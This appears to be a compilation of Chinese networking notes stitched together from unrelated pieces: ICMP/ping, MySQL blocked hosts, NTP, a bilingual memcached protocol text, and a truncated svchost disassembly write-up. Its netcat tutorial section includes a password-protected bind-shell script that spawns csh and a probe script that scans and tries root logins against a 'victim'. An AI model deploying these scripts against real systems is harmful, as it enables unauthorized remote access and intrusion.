

1. 首先,ping使用的是什么协议?

ping 使用的是ICMP协议,ICMP的详细解释,请参见:中国协议分析网:http://www.cnpaf.net/

2. 怎样在Windows下让别人ping不到我?

网络连接 > 更改防火墙设置 > 高级
ICMP > 设置
取消 “允许传入回显请求”

3. 怎样在Linux下让别人ping不到我?


4. 各种类型的ICMP报文





Host 'host_name' is blocked

Mysql 服务器在客户端连续产生过多的connect错误时(错误个数超过max_connect_errors),那么该客户端就被列入黑名单,用比较专业的话来说就是"被block了",该客户端将永远不能再连接,直到服务器 flush hosts;  如果错误连接没有达到max_connect_errors时又可以正常连接了,那么计数器清零。




mysql 的系统 变量:

mysql 的错误解释:



1. 服务器端如何查看被block的主机


曾经两次安装 时间服务器:

1. NTP服务器启动之后需要等待几分钟才能使用,否则错误为:no server suitable for synchronization found

2. ntp.conf 需要配置,内容大致为:


# NTP Network Time Protocol
# ATTENTION: *You have to restart the NTP service when you change this file to activate the changes*# Configuration File created by Windows Binary Distribution Installer Rev.: 1.23  mbg
# please check http://www.ntp.org for additional documentation and background information
# Use drift file
driftfile "C:\Program Files\NTP\etc\ntp.drift"

# your local system clock, could be used as a backup
# (this is only useful if you need to distribute time no matter how good or bad it is)
# but it should operate at a high stratum level to let the clients know and force them to
# use any other timesource they may have.
#fudge stratum 12

# End of generated ntp.conf — Please edit this to suite your needs





Network Time Protocol(NTP)是用来使计算机时间同步化的一种协议,它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)做同步化,它可以提供高精准度的时间校正(LAN上与标准间差小于1毫秒,WAN上几十毫秒),且可介由加密确认的方式来防止恶毒的协议攻击。


NTP提供准确时间,首先要有准确的时间来源,这一时间应该是国际标准时间UTC。 NTP获得UTC的时间来源可以是原子钟、天文台、卫星,也可以从Internet上获取。这样就有了准确而可靠的时间源。时间按NTP服务器的等级传播。按照离外部UTC 源的远近将所有服务器归入不同的Stratun(层)中。Stratum-1在顶层,有外部UTC接入,而Stratum-2则从Stratum-1获取时间,Stratum-3从Stratum-2获取时间,以此类推,但Stratum层的总数限制在15以内。所有这些服务器在逻辑上形成阶梯式的架构相互连接,而Stratum-1的时间服务器是整个系统的基础。

计算机主机一般同多个时间服务器连接, 利用统计学的算法过滤来自不同服务器的时间,以选择最佳的路径和来源来校正主机时间。即使主机在长时间无法与某一时间服务器相联系的情况下,NTP服务依然有效运转。













Mode:模式。该字段包括以下值:0-预留;1-对称行为;3-客户机;4-服务器;5-广播;6-NTP 控制信息




Root Delay:有符号固定点序号表示主要参考源的总延迟,很短时间内的位15到16间的分段点。

Root Dispersion:无符号固定点序号表示相对于主要参考源的正常差错,很短时间内的位15到16间的分段点。

Reference Identifier:识别特殊参考源。

Originate Timestamp:这是向服务器请求分离客户机的时间,采用64位时标(Timestamp)格式。

Receive Timestamp:这是向服务器请求到达客户机的时间,采用64位时标(Timestamp)格式。

Transmit Timestamp:这是向客户机答复分离服务器的时间,采用64位时标(Timestamp)格式。

Authenticator(Optional):当实现了 NTP 认证模式,主要标识符和信息数字域就包括已定义的信息认证代码(MAC)信息。



Quack# nc -h
想要连接到某处:   nc [-options] hostname port[s] [ports] …
绑定端口等待连接:     nc -l -p port [-options] [hostname] [port]
        -e prog                 程序重定向,一旦连接,就执行 [危险!!]
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      帮助信息
        -i secs                 延时的间隔
        -l                      监听模式,用于入站连接
        -n                      指定数字的IP地址,不能用hostname
        -o file                 记录16进制的传输
        -p port                 本地端口号
        -r                      任意指定本地及远程端口
        -s addr                 本地源地址
        -u                      UDP模式
        -v                      详细输出——用两个-v可得到更详细的内容
        -w secs                 timeout的时间
        -z                      将输入输出关掉——用于扫描时


#! /bin/sh
## 类似于rcp,但是是用netcat在高端口做的
## 在接收文件的机器上做"ncp targetfile"
## 在发送文件的机器上做"ncp sourcefile receivinghost"
## 如果调用了 "nzp" ,会将传输文件压缩

## 这里定义你想使用的端口,可以自由选择

## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改
# PATH=${HOME}:${PATH} ; export PATH

## 下面这几行检查参数输入情况
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=echo $0 | sed 's+.*/++'
test "$me" = "nzp" && echo ‘[compressed mode]’

# if second arg, it’s a host to send an [extant] file to.
if test "$2" ; then
  test ! -f "$1" && echo "can’t find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  echo "transfer FAILED!"
  exit 1

# 是否在接收文件机器当前目录有同名文件
if test -f "$1" ; then
  echo -n "Overwrite $1? "
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
# 注意这里nc的用法,结合了重定向符号和管道
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c  > "$1" && exit 0
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1

这样的话,我只要在A机器上先 QuackA# ncp ../abcd
listening on [any] 23456 …
QuackB#ncp abcd
quackb [] 23456 (?)
open connect to [] from quackb [] 1027


首先要清楚,如果你编译netcat时仅用如make freebsd之类的命令来编译的话,这个工

#! /bin/sh
## 一个利用nc的绑定shell并且带有密码保护的脚本
## 带有一个参数,即端口号


case "$1" in
  ?* )
  export LPN
  sleep 1
  echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
  echo "launched on port $LPN"
  exit 0

# here we play inetd
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &

while read qq ; do
case "$qq" in
# 这里就是弱密码保护了,密码是quack
  quack )
  cd /
  exec csh -i

quack# ./bsh 6666  <——-输入,后面是程序输出
-l -p 6666 -e ./bsh
launched on port 6666
quack## nc localhost 6666  <———-输入
-l -p 6666 -e ./bsh
quack    <———-输入,密码验证
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.

四、 用于端口扫描——probe

在我们常见的一些端口扫描程序中,如Vetescan这类以shell script写成的话,很多都

#! /bin/sh
## launch a whole buncha shit at yon victim in no particular order; capture
## stderr+stdout in one place.  Run as root for rservice and low -p to work.
## Fairly thorough example of using netcat to collect a lot of host info.
## Will set off every intrusion alarm in existence on a paranoid machine!

# 该目录里有一些小工具
# 指定网关

# might conceivably wanna change this for different run styles
UCMD=’nc -v -w 8′

test ! "$1" && echo Needs victim arg && exit 1

echo ” | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo ‘0’ | $UCMD "$1" 79 2>&1
# if LSRR was passed thru, should get refusal here:
# 要注意这里的用法,其实nc的这些参数掌握好可以做很多事情
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s hostname may be wrong for some multihomed machines
echo ‘UDP echoecho!’ | nc -u -p 7 -s hostname -w 3 "$1" 7 19 2>&1
echo ‘113,10158’ | $UCMD -p 10158 "$1" 113 2>&1
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo ”
echo PASV | $UCMD -r "$1" 21 2>&1
echo ‘GET /’ | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# 知道robots.txt是什么文件么?;)
echo ‘GET /robots.txt’ | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# 利用小工具rservice来尝试,该工具可以在nc110.tgz的data目录里找到
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
rservice root root | $UCMD -r "$1" exec 2>&1
echo ‘BEGIN big udp — everything may look "open" if packet-filtered’
data -g < ${DDIR}/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1
# no wait-time, uses RTT hack
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1
echo ‘END big udp’
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1
# Use our identd-sniffer!
iscan "$1" 21 25 79 80 111 53 6667 6000 2049 119 2>&1
# this gets pretty intrusive, but what the fuck.  Probe for portmap first
if nc -w 5 -z -u "$1" 111 ; then
  showmount -e "$1" 2>&1   #象showmount和rpcinfo的使用,可能会被逮到;)
  rpcinfo -p "$1" 2>&1
exit 0



Memcache 协议(中英对照)


























































































































































































































































































































































































































































































memcached 的客户端使用TCP链接 与 服务器通讯。(UDP接口也同样有效,参考后文的 “UDP协议” )一个运行中的memcached服务器监视一些(可设置)端口。客户端连接这些端口,发送命令到服务器,读取回应,最后关闭连接。 Clients of memcached communicate with server through TCP connections. (A UDP interface is also available; details are below under "UDP protocol.") A given running memcached server listens on some (configurable) port; clients connect to that port, send commands to the server, read responses, and eventually close the connection.
结束会话不需要发送任何命令。当不再需memcached服务时,要客户端可以在任何时候关闭连接。需要注意的是,鼓励客户端缓存这些连接,而不是每次需要存取数据时都重新打开连接。这是因为memcached 被特意设计成及时开启很多连接也能够高效的工作(数百个,上千个如果需要的话)。缓存这些连接,可以消除建立连接所带来的开销(/*/相对而言,在服务器端建立一个新连接的准备工作所带来的开销,可以忽略不计。)。 There is no need to send any command to end the session. A client may just close the connection at any moment it no longer needs it. Note, however, that clients are encouraged to cache their connections rather than reopen them every time they need to store or retrieve data. This is because memcached is especially designed to work very efficiently with a very large number (many hundreds, more than a thousand if necessary) of open connections. Caching connections will eliminate the overhead associated with establishing a TCP connection (the overhead of preparing for a new connection on the server side is insignificant compared to this).
memcache协议中发送的数据分两种:文本行 和 自由数据。 文本行被用于来自客户端的命令和服务器的回应。自由数据用于客户端从服务器端存取数据时。同样服务器会以字节流的方式传回自由数据。/*/服务器不用关心自由数据的字节顺序。自由数据的特征没有任何限制;但是通过前文提到的文本行,这项数据的接受者(服务器或客户端),便能够精确地获知所发送的数据库的长度。
There are two kinds of data sent in the memcache protocol: text lines
            and unstructured data. Text lines are used for commands from clients
            and responses from servers. Unstructured data is sent when a client
            wants to store or retrieve data. The server will transmit back
            unstructured data in exactly the same way it received it, as a byte
            stream. The server doesn’t care about byte order issues in
            unstructured data and isn’t aware of them. There are no limitations on
            characters that may appear in unstructured data; however, the reader
            of such data (either a client or a server) will always know, from a
            preceding text line, the exact length of the data block being
文本行固定以“\r\n”(回车符紧跟一个换行符)结束。 自由数据也是同样会以“\r\n”结束,但是 \r(回车符)、\n(换行符),以及任何其他8位字符,均可出现在数据中。因此,当客户端从服务器取回数据时,必须使用数据区块的长度来确定数据区块的结束位置,而不要依据数据区块末尾的“\r\n”,即使它们固定存在于此。
Text lines are always terminated by \r\n. Unstructured data is _also_
            terminated by \r\n, even though \r, \n or any other 8-bit characters
            may also appear inside the data. Therefore, when a client retrieves
            data from a server, it must use the length of the data block (which it
            will be provided with) to determine where the data block ends, and not
            the fact that \r\n follows the end of the data block, even though it






Data stored by memcached is identified with the help of a key. A key
            is a text string which should uniquely identify the data for clients
            that are interested in storing and retrieving it. Currently the
            length limit of a key is set at 250 characters (of course, normally
            clients wouldn’t need to use such long keys); the key must not include
            control characters or whitespace.






所有命令分为3种类型 There are three types of commands.
Storage commands (there are three: "set", "add" and "replace") ask the
            server to store some data identified by a key. The client sends a
            command line, and then a data block; after that the client expects one
            line of response, which will indicate success or faulure.
Retrieval commands (there is only one: "get") ask the server to
            retrieve data corresponding to a set of keys (one or more keys in one
            request). The client sends a command line, which includes all the
            requested keys; after that for each item the server finds it sends to
            the client one response line with information about the item, and one
            data block with the item’s data; this continues until the server
            finished with the "END" response line.
All other commands don’t involve unstructured data. In all of them,
            the client sends one command line, and expects (depending on the
            command) either one line of response, or several lines of response
            ending with "END" on the last line.
A command line always starts with the name of the command, followed by
            parameters (if any) delimited by whitespace. Command names are
            lower-case and are case-sensitive.
一些客户端发送给服务器的命令会包含一些时限(针对内容或客户端请求的操作)。这时,时限的具体内容既可以是Unix时间戳(从1970年1月1日开始的秒钟数),或当前时间开始的秒钟数。对后者而言,不能超过 60*60*24*30(30天);如果超出,服务器将会理解为Unix时间戳,而不是从当前时间起的秒偏移。
Some commands involve a client sending some kind of expiration time
            (relative to an item or to an operation requested by the client) to
            the server. In all such cases, the actual value sent may either be
            Unix time (number of seconds since January 1, 1970, as a 32-bit
            value), or a number of seconds starting from current time. In the
            latter case, this number of seconds may not exceed 60*60*24*30 (number
            of seconds in 30 days); if the number sent by a client is larger than
            that, the server will consider it to be real Unix time value rather
            than an offset from current time.




Error strings


每一个由客户端发送的命令,都可能收到来自服务器的错误字串回复。这些错误字串会以三种形式出现: Each command sent by a client may be answered with an error string
            from the server. These error strings come in three types:
– "ERROR\r\n"
意味着客户端发送了不存在的命令名称。 means the client sent a nonexistent command name.
– "CLIENT_ERROR <error>\r\n"
意味着输入的命令行里存在一些客户端错误,例如输入未遵循协议。<error>部分是人类易于理解的错误解说…… means some sort of client error in the input line, i.e. the input
            doesn’t conform to the protocol in some way. <error> is a
            human-readable error string.
– "SERVER_ERROR <error>\r\n"
means some sort of server error prevents the server from carrying
            out the command. <error> is a human-readable error string. In cases
            of severe server errors, which make it impossible to continue
            serving the client (this shouldn’t normally happen), the server will
            close the connection after sending the error line. This is the only
            case in which the server closes a connection to a client.
在后面每项命令的描述中,这些错误行不会再特别提到,但是客户端必须考虑到这些它们存在的可能性。 In the descriptions of individual commands below, these error lines
            are not again specifically mentioned, but clients must allow for their




Storage commands


首先,客户端会发送一行像这样的命令: First, the client sends a command line which looks like this:
<command name> <key> <flags> <exptime> <bytes>\r\n
– <command name> 是 set, add, 或者 repalce – <command name> is "set", "add" or "replace"


  • set 意思是 “储存此数据”

  • add 意思是 “储存此数据,只在服务器*未*保留此键值的数据时”

  • replace意思是 “储存此数据,只在服务器*曾*保留此键值的数据时”




  • "set" means "store this data".

  • "add" means "store this data, but only if the server *doesn’t* already
                    hold data for this key".

  • "replace" means "store this data, but only if the server *does*
                    already hold data for this key".


– <key> 是接下来的客户端所要求储存的数据的键值 – <key> is the key under which the client asks to store the data
– <flags> 是在取回内容时,与数据和发送块一同保存服务器上的任意16位无符号整形(用十进制来书写)。客户端可以用它作为“位域”来存储一些特定的信息;它对服务器是不透明的。
– <flags> is an arbitrary 16-bit unsigned integer (written out in
            decimal) that the server stores along with the data and sends back
            when the item is retrieved. Clients may use this as a bit field to
            store data-specific information; this field is opaque to the server.
– <exptime> 是终止时间。如果为0,该项永不过期(虽然它可能被删除,以便为其他缓存项目腾出位置)。如果非0(Unix时间戳或当前时刻的秒偏移),到达终止时间后,客户端无法再获得这项内容。
– <exptime> is expiration time. If it’s 0, the item never expires
            (although it may be deleted from the cache to make place for other
            items). If it’s non-zero (either Unix time or offset in seconds from
            current time), it is guaranteed that clients will not be able to
            retrieve this item after the expiration time arrives (measured by
            server time).
– <bytes> 是随后的数据区块的字节长度,不包括用于分野的“\r\n”。它可以是0(这时后面跟随一个空的数据区块)。 – <bytes> is the number of bytes in the data block to follow, *not*
            including the delimiting \r\n. <bytes> may be zero (in which case
            it’s followed by an empty data block).
在这一行以后,客户端发送数据区块。 After this line, the client sends the data block:
<data block>\r\n
– <data block> 是大段的8位数据,其长度由前面的命令行中的<bytes>指定。 – <data block> is a chunk of arbitrary 8-bit data of length <bytes>
            from the previous line.
发送命令行和数据区块以后,客户端等待回复,可能的回复如下: After sending the command line and the data blockm the client awaits
            the reply, which may be:
– "STORED\r\n"
表明成功. to indicate success.
– "NOT_STORED\r\n"
表明数据没有被存储,但不是因为发生错误。这通常意味着add 或 replace命令的条件不成立,或者,项目已经位列删除队列(参考后文的“delete”命令)。
to indicate the data was not stored, but not
            because of an error. This normally means that either that the
            condition for an "add" or a "replace" command wasn’t met, or that the
            item is in a delete queue (see the "delete" command below).




Retrieval command


一行取回命令如下: The retrieval command looks like this:
get <key>*\r\n
– <key>* 表示一个或多个键值,由空格隔开的字串 – <key>* means one or more key strings separated by whitespace.
After this command, the client expects zero or more items, each of
            which is received as a text line followed by a data block. After all
            the items have been transmitted, the server sends the string
来指示回应完毕。 to indicate the end of response.
服务器用以下形式发送每项内容: Each item sent by the server looks like this:
VALUE <key> <flags> <bytes>\r\n
            <data block>\r\n
– <key> 是所发送的键名 – <key> is the key for the item being sent
– <flags> 是存储命令所设置的记号             

– <flags> is the flags value set by the storage command


– <bytes> 是随后数据块的长度,*不包括* 它的界定符“\r\n” – <bytes> is the length of the data block to follow, *not* including
            its delimiting \r\n
– <data block> 是发送的数据 – <data block> is the data for this item.
If some of the keys appearing in a retrieval request are not sent back
            by the server in the item list this means that the server does not
            hold items with such keys (because they were never stored, or stored
            but deleted to make space for more items, or expired, or explicitly
            deleted by a client).






命令“delete”允许从外部删除内容: The command "delete" allows for explicit deletion of items:
delete <key> <time>\r\n
– <key> 是客户端希望服务器删除的内容的键名 – <key> is the key of the item the client wishes the server to delete
– <time> 是一个单位为秒的时间(或代表直到某一刻的Unix时间),在该时间内服务器会拒绝对于此键名的“add”和“replace”命令。此时内容被放入delete队列,无法再通过“get”得到该内容,也无法是用“add”和“replace”命令(但是“set”命令可用)。直到指定时间,这些内容被最终从服务器的内存中彻底清除。
– <time> is the amount of time in seconds (or Unix time until which)
            the client wishes the server to refuse "add" and "replace" commands
            with this key. For this amount of item, the item is put into a
            delete queue, which means that it won’t possible to retrieve it by
            the "get" command, but "add" and "replace" command with this key
            will also fail (the "set" command will succeed, however). After the
            time passes, the item is finally deleted from server memory.
<time>参数 是可选的,缺省为0(表示内容会立刻清除,并且随后的存储命令均可用)。
The parameter <time> is optional, and, if absent, defaults to 0
            (which means that the item will be deleted immediately and further
            storage commands with this key will succeed).
此命令有一行回应: The response line to this command can be one of:
– "DELETED\r\n"
表示执行成功 to indicate success
– "NOT_FOUND\r\n"
表示没有找到这项内容 to indicate that the item with this key was not found.
See the "flush_all" command below for immediate invalidation
            of all existing items.






命令 “incr” 和 “decr”被用来修改数据,当一些内容需要 替换、增加 或减少时。这些数据必须是十进制的32位无符号整新。如果不是,则当作0来处理。修改的内容必须存在,当使用“incr”/“decr”命令修改不存在的内容时,不会被当作0处理,而是操作失败。
Commands "incr" and "decr" are used to change data for some item
            in-place, incrementing or decrementing it. The data for the item is
            treated as decimal representation of a 32-bit unsigned integer. If the
            current data value does not conform to such a representation, the
            commands behave as if the value were 0. Also, the item must already
            exist for incr/decr to work; these commands won’t pretend that a
            non-existent key exists with value 0; instead, they will fail.
客户端发送命令行: The client sends the command line:
incr <key> <value>\r\n
            decr <key> <value>\r\n
– <key> 是客户端希望修改的内容的建名             

– <key> is the key of the item the client wishes to change


– <value> 是客户端要增加/减少的总数。 – <value> is the amount by which the client wants to increase/decrease
            the item. It is a decimal representation of a 32-bit unsigned integer.

The response will be one of:


– "NOT_FOUND\r\n"
指示该项内容的值,不存在。 to indicate the item with this value was not found
– <value>\r\n ,<value>是 增加/减少 。 – <value>\r\n , where <value> is the new value of the item’s data,
            after the increment/decrement operation was carried out.
注意"decr"命令发生下溢:如果客户端尝试减少的结果小于0时,结果会是0。"incr" 命令不会发生溢出。 Note that underflow in the "decr" command is caught: if a client tries
            to decrease the value below 0, the new value will be 0. Overflow in
            the "incr" command is not checked.





Note also that decrementing a number such that it loses length isn’t
            guaranteed to decrement its returned length. The number MAY be
            space-padded at the end, but this is purely an implementation
            optimization, so you also shouldn’t rely on that.






命令"stats" 被用于查询服务器的运行状态和其他内部数据。有两种格式。不带参数的:
The command "stats" is used to query the server about statistics it
            maintains and other internal data. It has two forms. Without

it causes the server to output general-purpose statistics and
            settings, documented below. In the other form it has some arguments:


stats <args>\r\n
通过<args>,服务器传回各种内部数据。因为随时可能发生变动,本文不提供参数的种类及其传回数据。 Depending on <args>, various internal data is sent by the server. The
            kinds of arguments and the data sent are not documented in this vesion
            of the protocol, and are subject to change for the convenience of
            memcache developers.




General-purpose statistics


受到无参数的"stats"命令后,服务器发送多行内容,如下: Upon receiving the "stats" command without arguments, the server sents
            a number of lines which look like this:
STAT <name> <value>\r\n
服务器用以下一行来终止这个清单: The server terminates this list with the line
在每行状态中,<name> 是状态的名字,<value> 使状态的数据。 以下清单,是所有的状态名称,数据类型,和数据代表的含义。
In each line of statistics, <name> is the name of this statistic, and
            <value> is the data. The following is the list of all names sent in
            response to the "stats" command, together with the type of the value
            sent for this name, and the meaning of the value.

In the type column below, "32u" means a 32-bit unsigned integer, "64u"
            means a 64-bit unsigner integer. ’32u:32u’ means two 32-but unsigned
            integers separated by a colon.





























































































































名称/Name 类型/Type 含义/Meaning
pid 32u 服务器进程ID Process id of this server process
uptime 32u 服务器运行时间,单位秒 Number of seconds this server has been running
time 32u 服务器当前的UNIX时间 current UNIX time according to the server
version string 服务器的版本号 Version string of this server
rusage_user 32u:32u 该进程累计的用户时间
Accumulated user time for this process
rusage_system 32u:32u 该进程累计的系统时间
Accumulated system time for this process
curr_items 32u 服务器当前存储的内容数量 Current number of items stored by the server
total_items 32u 服务器启动以来存储过的内容总数 Total number of items stored by this server
                        ever since it started
bytes 64u 服务器当前存储内容所占用的字节数 Current number of bytes used by this server
                        to store items
curr_connections 32u 连接数量 Number of open connections
total_connections 32u 服务器运行以来接受的连接总数 Total number of connections opened since
                        the server started running
connection_structures 32u 服务器分配的连接结构的数量 Number of connection structures allocated
                        by the server
cmd_get 32u 取回请求总数 Cumulative number of retrieval requests
cmd_set 32u 存储请求总数 Cumulative number of storage requests
get_hits 32u 请求成功的总次数 Number of keys that have been requested and
                        found present
get_misses 32u 请求失败的总次数 Number of items that have been requested
                        and not found
bytes_read 64u 服务器从网络读取到的总字节数 Total number of bytes read by this server
                        from network
bytes_written 64u 服务器向网络发送的总字节数 Total number of bytes sent by this server to
limit_maxbytes 32u 服务器在存储时被允许使用的字节总数 Number of bytes this server is allowed to
                        use for storage.






Other commands



“flush_all”命令有一个可选的数字参数。它总是执行成功,服务器会发送“OK\r\n”回应。它的效果是使已经存在的项目立即失效(缺省),或在指定的时间后。此后执行取回命令,将不会有任何内容返回(除非重新存储同样的键名)。flush_all 实际上没有立即释放项目所占用的内存,而是在随后陆续有新的项目被储存时执行。flush_all 效果具体如下:它导致所有更新时间早于flush_all所设定时间的项目,在被执行取回命令时命令被忽略。


"flush_all" is a command with an optional numeric argument. It always succeeds, and the server sends "OK\r\n" in response. Its effect is to invalidate all existing items immediately (by default) or after the expiration specified. After invalidation none of the items will be returned in response to a retrieval command (unless it’s stored again under the same key *after* flush_all has invalidated the items). flush_all doesn’t actually free all the memory taken up by existing items; that will happen gradually as new items are stored. The most precise definition of what flush_all does is the following: it causes all items whose update time is earlier than the time at which flush_all was set to be executed to be ignored for retrieval purposes.
“version”命令没有参数: "version" is a command with no arguments:
在回应中,服务器发送: In response, the server sends
"VERSION <version>\r\n"
<version> 是服务器的版本字串。 where <version> is the version string for the server.
“quit”命令没有参数: "quit" is a command with no arguments:
接收此命令后,服务器关闭连接。不过,客户端可以在不再需要时,简单地关闭连接就行,并不一定需要发送这个命令。 Upon receiving this command, the server closes the connection. However, the client may also simply close the connection when it no longer needs it, without issuing this command.

UDP 协议



UDP protocol


当来自客户端的连接数远大于TCP连接的上限时,可以使用基于UDP的接口。UDP接口不能保证传输到位,所以只有在不要求成功的操作中使用;比如被用于一个“get”请求时,会因不当的缓存处理而发生错误或回应有遗失。 For very large installations where the number of clients is high enough that the number of TCP connections causes scaling difficulties, there is also a UDP-based interface. The UDP interface does not provide guaranteed delivery, so should only be used for operations that aren’t required to succeed; typically it is used for "get" requests where a missing or incomplete response can simply be treated as a cache miss.
每个UDP数据包都包含一个简单的帧头,数据之后的内容与TCP协议的描述类似。在执行所产生的数据流中,请求必须被包含在单独的一个UDP数据包中,但是回应可能跨越多个数据包。(只有“get”和“set”请求例外,跨越了多个数据包) Each UDP datagram contains a simple frame header, followed by data in the same format as the TCP protocol described above. In the current implementation, requests must be contained in a single UDP datagram, but responses may span several datagrams. (The only common requests that would span multiple datagrams are huge multi-key "get" requests and "set" requests, both of which are more suitable to TCP transport for reliability reasons anyway.)
帧头有8字节长,如下(均由16位整数组成,网络字节顺序,高位在前): The frame header is 8 bytes long, as follows (all values are 16-bit integers in network byte order, high byte first):


  • 0-1 请求ID

  • 2-3 序号

  • 4-5 该信息的数据包总数

  • 6-7 保留位,必须为0




  • 0-1 Request ID

  • 2-3 Sequence number

  • 4-5 Total number of datagrams in this message

  • 6-7 Reserved for future use; must be 0


请求ID有客户端提供。一般它会是一个从随机基数开始的递增值,不过客户端想用什么样的请求ID都可以。服务器的回应会包含一个和请求中的同样的ID。客户端使用请求ID来区分每一个回应。任何一个没有请求ID的数据包,可能是之前的请求遭到延迟而造成的,应该被丢弃。 The request ID is supplied by the client. Typically it will be a monotonically increasing value starting from a random seed, but the client is free to use whatever request IDs it likes. The server’s response will contain the same ID as the incoming request. The client uses the request ID to differentiate between responses to outstanding requests if there are several pending from the same server; any datagrams with an unknown request ID are probably delayed responses to an earlier request and should be discarded.
序号的返回是从0到n-1,n是该条信息的数据包数量。 The sequence number ranges from 0 to n-1, where n is the total number of datagrams in the message. The client should concatenate the payloads of the datagrams for a given response in sequence number order; the resulting byte stream will contain a complete response in the same format as the TCP protocol (including terminating \r\n sequences).


创建时间:2003-08-27 更新时间:2003-08-27
文章提交:bingle (bingle_at_email.com.cn)

   by bingle_at_email.com.cn

1. 多个服务共享一个Svchost.exe进程利与弊

windows 系统服务分为独立进程和共享进程两种,在windows NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows 2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有2个svchost进程,一个是RPCSS(Remote Procedure Call)服务进程,另外一个则是由很多服务共享的一个svchost.exe。而在windows XP中,则一般有4个以上的svchost.exe服务进程,windows 2003 server中则更多,可以看出把更多的系统内置服务以共享进程方式由svchost启动是ms的一个趋势。这样做在一定程度上减少了系统资源的消耗,不过也带来一定的不稳定因素,因为任何一个共享进程的服务因为错误退出进程就会导致整个进程中的所有服务都退出。另外就是有一点安全隐患,首先要介绍一下svchost.exe的实现机制。

2. Svchost原理



例如rpcss(Remote Procedure Call)在注册表中的位置是  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs,它的参数子键Parameters里有这样一项:


例如rpcss在注册表中 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs 有这样一项:
"ImagePath"=REG_EXPAND_SZ:"%SystemRoot%\system32\svchost -k rpcss"

svchost的所有组和组内的所有服务都在注册表的如下位置: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,例如windows 2000共有4组rpcss、netsvcs、wugroup、BITSgroup,其中最多的就是netsvcs=REG_MULTI_SZ:EventSystem.Ias.Iprip.Irmon.Netman.Nwsapagent.Rasauto.Rasman.Remoteaccess.SENS.Sharedaccess.Tapisrv.Ntmssvc.wzcsvc..


3. Svchost代码


这些问题要通过查看svchost代码获得。下边的代码是windows 2000+ service pack 4 的svchost反汇编片段,可以看出svchost程序还是很简单的。

主函数首先调用ProcCommandLine()对命令行进行分析,获得要启动的服务组,然后调用SvcHostOptions()查询该服务组的选项和服务组的所有服务,并使用一个数据结构 svcTable 来保存这些服务及其服务的DLL,然后调用PrepareSvcTable() 函数创建SERVICE_TABLE_ENTRY 结构,把所有处理函数SERVICE_MAIN_FUNCTION 指向自己的一个函数FuncServiceMain(),最后调用API StartServiceCtrlDispatcher() 注册这些服务的调度函数。

; =============================== Main Funcion ===========================================
.text:010010B8                 public start
.text:010010B8 start           proc near
.text:010010B8                 push    esi
.text:010010B9                 push    edi
.text:010010BA                 push    offset sub_1001EBA ; lpTopLevelExceptionFilter
.text:010010BF                 xor     edi, edi
.text:010010C1                 call    ds:SetUnhandledExceptionFilter
.text:010010C7                 push    1               ; uMode
.text:010010C9                 call    ds:SetErrorMode
.text:010010CF                 call    ds:GetProcessHeap
.text:010010D5                 push    eax
.text:010010D6                 call    sub_1001142
.text:010010DB                 mov     eax, offset dword_1003018
.text:010010E0                 push    offset unk_1003000 ; lpCriticalSection
.text:010010E5                 mov     dword_100301C, eax
.text:010010EA                 mov     dword_1003018, eax
.text:010010EF                 call    ds:InitializeCriticalSection
.text:010010F5                 call    ds:GetCommandLineW
.text:010010FB                 push    eax             ; lpString
.text:010010FC                 call    ProcCommandLine
.text:01001101                 mov     esi, eax
.text:01001103                 test    esi, esi
.text:01001105                 jz      short lab_doservice
.text:01001107                 push    esi
.text:01001108                 call    SvcHostOptions
.text:0100110D                 call    PrepareSvcTable
.text:01001112                 mov     edi, eax        ; SERVICE_TABLE_ENTRY returned
.text:01001114                 test    edi, edi
.text:01001116                 jz      short loc_1001128
.text:01001118                 mov     eax, [esi+10h]
.text:0100111B                 test    eax, eax
.text:0100111D                 jz      short loc_1001128
.text:0100111F                 push    dword ptr [esi+14h] ; dwCapabilities
.text:01001122                 push    eax             ; int
.text:01001123                 call    InitializeSecurity
.text:01001128 loc_1001128:                            ; CODE XREF: start+5Ej
.text:01001128                                         ; start+65j
.text:01001128                 push    esi             ; lpMem
.text:01001129                 call    HeapFreeMem
.text:0100112E lab_doservice:                          ; CODE XREF: start+4Dj
.text:0100112E                 test    edi, edi
.text:01001130                 jz      ExitProgram
.text:01001136                 push    edi             ; lpServiceStartTable
.text:01001137                 call    ds:StartServiceCtrlDispatcherW
